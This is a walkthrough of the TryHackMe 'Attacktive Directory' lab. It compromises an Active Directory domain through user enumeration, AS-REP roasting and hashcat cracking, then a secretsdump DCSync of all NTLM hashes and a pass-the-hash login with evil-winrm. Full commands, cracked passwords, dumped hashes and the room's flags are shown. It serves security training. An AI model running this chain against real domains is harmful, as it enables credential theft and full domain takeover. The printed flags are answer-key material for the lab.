TryHackMe - Attacktive Directory Write-up

https://tryhackme.com/r/room/attacktivedirectory

PreviousBrewing...

Last updated 8 months ago

Was this helpful?

TryHackMe - Attacktive Directory Write-up

https://tryhackme.com/r/room/attacktivedirectory

This write-up will focus on overall solving methodology, and not by-task basis.

Different tools are showcased to perform the same objective.

Enumeration

My target machine IP: 10.10.98.165

Check for domain name and naming contexts

First thing first, nmap scan.

nmap -n -sV --script "ldap* and not brute" 10.10.98.165 -vv -oN nmap.output

We've obtained some naming contexts and domain:

Alternative way to look for naming contexts:

root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=spookysec,DC=local
namingcontexts: CN=Configuration,DC=spookysec,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=spookysec,DC=local
namingcontexts: DC=DomainDnsZones,DC=spookysec,DC=local
namingcontexts: DC=ForestDnsZones,DC=spookysec,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Check NULL bind

Results show that it is unsuccessful.

root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -b DC=spookysec,DC=local
# extended LDIF
#
# LDAPv3
# base <DC=spookysec,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
root@ip-10-10-155-73:~#

Shares enumeration

The result shows us that we're not allowed to view the shares anonymously. We'll need to get some credentials in this case.

root@ip-10-10-155-73:~# smbclient -L //10.10.98.165 -N
WARNING: The "syslog" option is deprecated
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.98.165]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.98.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

User enumeration

Mini wordlists are provided by author in order to save us some time.

The tools that can be used are kerbrute and ldapsearch.

To install Kerbrute:

$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

$ chmod +x kerbrute_linux_amd64

# add to path
$ sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute

# test installation
$ kerbrute

Using the wordlists provided, we can run kerbrute to get some usernames:

root@ip-10-10-155-73:~# kerbrute userenum -d spookysec.local --dc 10.10.98.165 userlist.txt -o valid_users

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/22/24 - Ronnie Flathers @ropnop

2024/09/22 06:59:11 >  Using KDC(s):
2024/09/22 06:59:11 >  	10.10.98.165:88

2024/09/22 06:59:11 >  [+] VALID USERNAME:	 james@spookysec.local
2024/09/22 06:59:12 >  [+] VALID USERNAME:	 svc-admin@spookysec.local
2024/09/22 06:59:12 >  [+] VALID USERNAME:	 James@spookysec.local
2024/09/22 06:59:12 >  [+] VALID USERNAME:	 robin@spookysec.local
2024/09/22 06:59:13 >  [+] VALID USERNAME:	 darkstar@spookysec.local
2024/09/22 06:59:13 >  [+] VALID USERNAME:	 administrator@spookysec.local
2024/09/22 06:59:14 >  [+] VALID USERNAME:	 backup@spookysec.local
2024/09/22 06:59:15 >  [+] VALID USERNAME:	 paradox@spookysec.local
2024/09/22 06:59:18 >  [+] VALID USERNAME:	 JAMES@spookysec.local
2024/09/22 06:59:19 >  [+] VALID USERNAME:	 Robin@spookysec.local
2024/09/22 06:59:24 >  [+] VALID USERNAME:	 Administrator@spookysec.local
2024/09/22 06:59:36 >  [+] VALID USERNAME:	 Darkstar@spookysec.local
2024/09/22 06:59:40 >  [+] VALID USERNAME:	 Paradox@spookysec.local
2024/09/22 06:59:52 >  [+] VALID USERNAME:	 DARKSTAR@spookysec.local
2024/09/22 06:59:56 >  [+] VALID USERNAME:	 ori@spookysec.local
2024/09/22 07:00:03 >  [+] VALID USERNAME:	 ROBIN@spookysec.local
2024/09/22 07:00:20 >  Done! Tested 73317 usernames (16 valid) in 68.499 seconds

Some notable accounts are svc-admin (service admin) and backup.

Alternatively, ldapsearch can be run. But since we were not able to perform NULL bind, hence there will be no results shown with this method.

root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -b DC=spookysec,DC=local "(objectClass=person)" | grep "sAMAccountName:"
root@ip-10-10-155-73:~#

More information

We can get more info with enum4linux:

enum4linux 10.10.98.165

This tool help us to gather loads of information in an automated and easier manner.

Initial Foothold

Get password hash

Now since we've got some usernames in hand, we can try to perform AS-REP Roasting attack. The tool will first send authentication requests to the user accounts and figure out the ones that doesn't require Kerberos pre-authentication.

If successful, we'll get Kerberos TGT that has the user's password hash embeded. We can then extract the hash and crack it offline.

The hint in earlier tasks told us that svc-admin might be interesting for us, let's parse that value for our tool. Just press "Enter" without inputting any values when password is asked.

root@ip-10-10-155-73:~# GetNPUsers.py spookysec.local/svc-admin -dc-ip 10.10.98.165 -request
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

Password:
[*] Cannot authenticate svc-admin, getting its TGT
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563

Hooray! Ticket returned alongside with the hash.

I'll put it into a text file called svc-admin.hash.

root@ip-10-10-155-73:~# cat svc-admin.hash 
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563

Cracking the hash

The prefix told us that the mode that we need to use is 18200:

Remember the password list provided by the author earlier? We'll use that.

root@ip-10-10-155-73:~# hashcat -m 18200 svc-admin.hash passwordlist.txt 
hashcat (v6.1.1-66-g6a419d06) starting...

* Device #2: Outdated POCL OpenCL driver detected!

This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.

OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3832/3896 MB (974 MB allocatable), 2MCU

OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
===========================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 35 MB

Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563:management2005
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:d23bacacc84...6f6563
Time.Started.....: Sun Sep 22 07:32:20 2024 (0 secs)
Time.Estimated...: Sun Sep 22 07:32:20 2024 (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   578.5 kH/s (13.26ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/70188 (11.67%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 0/70188 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> whitey

Started: Sun Sep 22 07:31:59 2024
Stopped: Sun Sep 22 07:32:21 2024
root@ip-10-10-155-73:~#

Password for svc-admin is management2005.

Looking into shares

This time, we have a valid credentials to login into the share.

root@ip-10-10-155-73:~# smbclient -L //10.10.98.165 -U svc-admin%management2005
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backup          Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.98.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

For easier enumeration in the share, we'll switch to smbmap.

To install: sudo pip3 install smbmap

We've obtained a username called backup earlier, so it makes sense for us to have a look at the backup share first.

root@ip-10-10-155-73:~# smbmap -H 10.10.98.165 -u svc-admin -p management2005 -r backup

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...                                                                           [*] Detected 1 hosts serving SMB
[|] Authenticating...                                                                                    [*] Established 1 SMB connections(s) and 1 authenticated session(s)
[/] Enumerating shares...                                                                                [-] Enumerating shares...                                                                                [\] Enumerating shares...                                                                                [|] Enumerating shares...                                                                                [/] Enumerating shares...                                                                                [-] Enumerating shares...                                                                                                                                                                                    
[+] IP: 10.10.98.165:445	Name: ip-10-10-98-165.eu-west-1.compute.internal	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	backup                                            	READ ONLY	
	./backup
	dr--r--r--                0 Sat Apr  4 20:08:39 2020	.
	dr--r--r--                0 Sat Apr  4 20:08:39 2020	..
	fr--r--r--               48 Sat Apr  4 20:08:53 2020	backup_credentials.txt
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	SYSVOL                                            	READ ONLY	Logon server share 
[\] Closing connections..                                                                                [|] Closing connections..                                                                                [/] Closing connections..                                                                                [-] Closing connections..                                                                                [\] Closing connections..                                                                                [|] Closing connections..                                                                                [/] Closing connections..                                                                                [-] Closing connections..                                                                                [*] Closed 1 connections                                                                            
root@ip-10-10-155-73:~#

Recursive listing reveals a credential text file.

root@ip-10-10-155-73:~# smbclient //10.10.98.165/backup -U svc-admin
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 20:08:39 2020
  ..                                  D        0  Sat Apr  4 20:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 20:08:53 2020

		8247551 blocks of size 4096. 3664666 blocks available
smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> exit
root@ip-10-10-155-73:~# cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Upon clicking on the wand, we know that it's a base64 encoding.

Boom! It's the credential for user account backup: backup@spookysec.local:backup2517860

Alternative method of decoding base64 hash:

root@ip-10-10-155-73:~# cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860

Privilege Escalation

Get admin credentials

As mentioned by the author:

A backup account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.

Hmm, this means that we can try dumping all the password hashes that this backup account contains.

root@ip-10-10-155-73:~# secretsdump.py -outputfile secresdump.output -just-dc-ntlm spookysec.local/backup:backup2517860@10.10.98.165
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:7d4c1da7336435b8961a5840a7de68d7:::
[*] Cleaning up...

Ahhh, look what we've gotten, Administrator's hash.

Pass the hash

Now, we can perform pass-the-hash attack with the NTLM hash.

root@ip-10-10-155-73:~# evil-winrm -i 10.10.98.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Successful login!

Flags

Time to retrieve the flags from each user's Desktop.

Administrator:

*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/17/2020   4:04 PM                a-spooks
d-----        9/17/2020   4:02 PM                Administrator
d-----         4/4/2020  12:19 PM                backup
d-----         4/4/2020   1:07 PM                backup.THM-AD
d-r---         4/4/2020  11:19 AM                Public
d-----         4/4/2020  12:18 PM                svc-admin


*Evil-WinRM* PS C:\Users> ls Administrator/Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  11:39 AM             32 root.txt


*Evil-WinRM* PS C:\Users> cat Administrator/Desktop/root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
*Evil-WinRM* PS C:\Users>

svc-admin:

*Evil-WinRM* PS C:\Users> ls svc-admin/Desktop


    Directory: C:\Users\svc-admin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt


*Evil-WinRM* PS C:\Users> cat svc-admin/Desktop/user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\Users>

backup:

*Evil-WinRM* PS C:\Users> ls backup/Desktop


    Directory: C:\Users\backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt


*Evil-WinRM* PS C:\Users> cat backup/Desktop/PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
*Evil-WinRM* PS C:\Users>

That's it, hope you enjoyed :)